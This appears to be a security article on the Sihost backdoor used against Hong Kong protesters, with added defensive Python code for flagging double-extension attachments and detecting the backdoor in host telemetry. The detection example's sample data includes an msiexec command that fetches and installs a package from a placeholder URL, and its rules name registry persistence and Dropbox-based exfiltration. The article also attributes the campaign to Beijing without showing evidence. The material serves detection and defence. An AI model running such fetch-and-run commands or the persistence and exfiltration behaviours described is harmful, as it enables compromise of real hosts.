The protests in Hong Kong have been going on for quite a while now, and the Chinese government appears to be losing its patience and resorting to some innovative techniques. Recently, it was uncovered that Beijing had employed a threat actor to target the protesters in Hong Kong. The targeted protesters would receive an email masked as a message from a law student from the West. In the message, the attackers pretend to be interested in the protests and ask the recipient for 'recommendations to end the Hong Kong protests.' The attackers attach three files to the fraudulent email - two genuine ones and one that appears to be an '.RTF' document but is actually a '.LNK' file. Masking this malicious file as a harmless document is done with a double extension, a rather old but still effective trick.
Uses a '.PNG' File Masked as an Image
A '.LNK' file is a Windows shortcut, and in this Beijing campaign the shortcut points at 'msiexec.exe', the genuine Windows Installer executable. When the victim opens the '.LNK' file attached to the fake email, it runs 'msiexec.exe' and has it download a file from GitHub. The downloaded file appears to be a '.PNG' image, but it is in fact an executable. This executable generates hundreds of decoy files, and among them is the initial payload, 'siHost64.'
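The two deceptions described so far, a double extension and a file whose content does not match its extension, are both cheap to catch at the mail gateway or in a sandbox. The following is an added example (not code from the article or from the campaign's analysts) that sniffs the real type of an attachment from its leading bytes and flags both tricks; the sample bytes are constructed, not real samples from this campaign.

```python
"""Flag attachments with a double extension or a type/extension mismatch.

Added example, not from the original article. The LNK signature is the
fixed ShellLink header (HeaderSize 0x4C followed by the ShellLink CLSID);
the PE, PNG and RTF signatures are the standard file magics.
"""

# 4C 00 00 00 = HeaderSize, then CLSID 00021401-0000-0000-C000-000000000046
LNK_MAGIC = bytes.fromhex("4c0000000114020000000000c000000000000046")
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"

# File types that execute when double-clicked, whatever their name says.
EXECUTABLE_TYPES = {"lnk", "pe"}
# Extensions users read as passive documents or images.
DOCUMENT_EXTS = {"rtf", "doc", "docx", "pdf", "txt", "png", "jpg", "jpeg"}


def sniff_type(data: bytes) -> str:
    """Return the real type of the content from its leading bytes."""
    if data.startswith(LNK_MAGIC):
        return "lnk"
    if data.startswith(b"MZ"):
        return "pe"
    if data.startswith(PNG_MAGIC):
        return "png"
    if data.startswith(b"{\\rtf"):
        return "rtf"
    return "unknown"


def analyse_attachment(name: str, data: bytes) -> dict:
    """Compare the claimed extension against the sniffed content type."""
    exts = name.lower().split(".")[1:]
    claimed = exts[-1] if exts else ""
    real = sniff_type(data)
    findings = []

    # 'report.rtf.lnk': a document-looking extension hiding a non-document one.
    if len(exts) >= 2 and exts[-2] in DOCUMENT_EXTS and exts[-1] not in DOCUMENT_EXTS:
        findings.append(f"double extension: looks like .{exts[-2]} but is .{exts[-1]}")

    # 'photo.png' that starts with 'MZ': executable content behind a document name.
    if real in EXECUTABLE_TYPES and claimed != real:
        findings.append(f"content is {real} but extension is .{claimed}")

    # Any executable content in an attachment is worth a finding on its own.
    if real in EXECUTABLE_TYPES:
        findings.append(f"executable content ({real})")

    return {
        "name": name,
        "claimed_ext": claimed,
        "real_type": real,
        "findings": findings,
        "suspicious": bool(findings),
    }


# Constructed sample contents (not real malware): a minimal LNK header,
# a PE stub, a PNG header and an RTF header.
SAMPLE_LNK = LNK_MAGIC + b"\x00" * (0x4C - len(LNK_MAGIC))
SAMPLE_PE = b"MZ" + b"\x90" * 62
SAMPLE_PNG = PNG_MAGIC + b"\x00" * 16
SAMPLE_RTF = b"{\\rtf1\\ansi Hello}"

if __name__ == "__main__":
    for fname, blob in [
        ("Recommendations.rtf.lnk", SAMPLE_LNK),
        ("photo.png", SAMPLE_PE),
        ("photo.png", SAMPLE_PNG),
        ("notes.rtf", SAMPLE_RTF),
    ]:
        print(analyse_attachment(fname, blob))
```

The double-extension check only fires when the inner extension is one a user would trust; the content check is independent of the name, so a bare '.lnk' or a renamed '.exe' is still caught.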
The %APPDATA% folder would contain a Python script called 'siHost64.' This script is meant to:
- Gain persistence by tampering with the Windows Registry.
- Establish a connection with the attackers' C&C (Command & Control) server, which operates with the help of the Dropbox API.
- Use the C&C server to fetch files containing encrypted commands. After decrypting the commands, the threat executes them, stores the results in a new encrypted file, and periodically exfiltrates that file to the C&C server.
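Each of the three behaviours above leaves a trace in ordinary host telemetry: a shortcut launching 'msiexec.exe' with a remote package, a Run-key value pointing into %APPDATA%, and a non-browser process talking to the Dropbox API. The following is an added example (not the article's data nor any product's real schema) of detection logic run over a handful of constructed, loosely Sysmon-like event records; the hostnames, paths and URL in the records are placeholders, not indicators from this campaign.

```python
"""Detect the three siHost64 behaviours in constructed host telemetry.

Added example, not from the original article. Event records and field
names are constructed and simplified; adapt them to your own telemetry.
"""
import re
from typing import Dict, List

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
DROPBOX_API = re.compile(r"(^|\.)dropboxapi\.com$", re.IGNORECASE)
# Processes for which Dropbox API traffic is expected (tune per environment).
DROPBOX_ALLOWED = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe", "dropbox.exe"}

# Constructed sample events (placeholder paths and hosts, not real IoCs).
EVENTS: List[Dict] = [
    {"type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "msiexec.exe /q /i https://example.invalid/repo/raw/pic.png"},
    {"type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\siHost64",
     "value": r"C:\Users\user\AppData\Roaming\python\pythonw.exe C:\Users\user\AppData\Roaming\siHost64.py"},
    {"type": "network", "image": r"C:\Users\user\AppData\Roaming\python\pythonw.exe",
     "dest_host": "api.dropboxapi.com", "dest_port": 443},
    # Benign look-alikes that must not alert:
    {"type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"msiexec.exe /i C:\Installers\app.msi"},
    {"type": "network", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_host": "api.dropboxapi.com", "dest_port": 443},
]


def basename(path: str) -> str:
    """Last path component, lower-cased, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: List[Dict]) -> List[Dict]:
    """Return one alert per event that matches a rule, in event order."""
    alerts = []
    for ev in events:
        kind = ev["type"]
        if kind == "process":
            # msiexec asked to install a package from a URL rather than a local path.
            if basename(ev["image"]) == "msiexec.exe" and REMOTE_URL.search(ev["cmdline"]):
                alerts.append({"rule": "msiexec_remote_package", "evidence": ev["cmdline"]})
        elif kind == "registry":
            # Autorun entry whose command lives under a user's AppData directory.
            if RUN_KEY.search(ev["key"]) and "\\appdata\\" in ev["value"].lower():
                alerts.append({"rule": "autorun_from_appdata", "evidence": ev["key"]})
        elif kind == "network":
            # Dropbox API traffic from a process that is not a browser or the Dropbox client.
            if DROPBOX_API.search(ev["dest_host"]) and basename(ev["image"]) not in DROPBOX_ALLOWED:
                alerts.append({"rule": "nonbrowser_dropbox_api", "evidence": ev["image"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert["rule"], "->", alert["evidence"])
```

The Dropbox rule is the noisiest of the three on its own, since legitimate software also uses that API; it becomes useful when correlated with the other two on the same host, or when the source process is an interpreter such as 'pythonw.exe' running from a user profile.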
In essence, the Sihost threat is a spying tool. This backdoor Trojan allows its operators to gather information from the compromised host and transfer it to the attackers' server.
It is clear that the Sihost malware is not meant to target random users. The threat has a very low infection ratio, and its victims appear to be in the Chinese region, which has led experts to believe that the Sihost Trojan was developed to target Hong Kong protesters exclusively. The threat is very well-developed, and it is clear that experienced cybercriminals created the Sihost backdoor Trojan.